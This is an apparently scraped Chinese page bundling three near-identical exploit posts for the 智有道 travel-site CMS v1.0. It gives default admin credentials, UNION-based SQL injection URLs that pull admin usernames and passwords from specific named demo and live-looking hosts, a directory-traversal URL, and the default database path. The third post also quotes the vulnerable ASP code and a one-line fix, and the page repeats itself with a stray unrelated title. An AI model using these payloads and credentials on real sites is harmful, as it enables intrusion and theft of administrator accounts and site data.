智有道专业旅游系统 v1.0 漏洞漏洞预警

智有道专业旅游系统 v1.0 漏洞漏洞预警（精选3篇）

篇1：智有道专业旅游系统 v1.0 漏洞漏洞预警

默认信息:

“智有道”专业旅游网站系统是智有道团队专业开发，针对目前的旅游平台进行强大的功能开发!

后台管理

后台路径：admin/login.asp

管理员：user:admin

密码：psw:123456

下载地址:down.chinaz.com/soft/30295.htm

Demo Url:will2011.w701.hzdemo.cn/

exp:

will2011.w701.hzdemo.cn/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15,16,17 from admin

或者：

will2011.w701.hzdemo.cn/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin

遍历目录：

www.0855.tv/admin/do/admin_uploadfile.asp?id=1&dir=../..

其它：

www.0855.tv/admin/do/Admin_Style.asp

www.0855.tv/admin/do/data.asp

关键字：

为防批量，特略，

智有道专业旅游系统 v1.0 漏洞漏洞预警

，

篇2：智有道专业旅游系统 v1.0 漏洞漏洞预警

“智有道”专业旅游网站系统是智有道团队专业开发，针对目前的旅游平台进行强大的功能开发！

后台管理

后台路径：admin/login.asp

管理员：user:admin

密码：psw:123456

下载地址:down.chinaz.com/soft/30295.htm

Demo Url:will.w701.hzdemo.cn/

exp:

will2011.w701.hzdemo.cn/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15,16,17 from admin

或者：

will2011.w701.hzdemo.cn/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin

遍历目录：

www.0855.tv/admin/do/admin_uploadfile.asp?id=1&dir=../..

其它：

www.0855.tv/admin/do/Admin_Style.asp

www.0855.tv/admin/do/data.asp

关键字：

为防批量，特略，

智有道专业旅游系统 v1.0 漏洞漏洞预警

篇3：智有道专业旅游系统 v1.0 漏洞漏洞预警

Blog:www.hi.baidu.com/alonecode

1)注入漏洞：

漏洞文件:new_list.asp:

bid = trim(request(“bid”))

sid = trim(request(“sid”))

…

if bid“” then

bwhere = “ and bigid=”& bid &“”

else

bwhere = “”

end if

if sid“” then

swhere = “ and smallid=”& sid &“”

else

swhere = “”

end if

idsql=“select * from lxscms_n where shenhe=1”& bwhere & swhere &“ order by id desc”

表名:lxscms_u字段:qwbmuname,qwbmupwds

默认后台:/admin

2)数据库默认地址:

/admin/#a&_as12=b.as.mdb

修复：new_list.asp页面过滤参数输入，

仙游旅行社管理系统v1.0漏洞及修复漏洞预警

，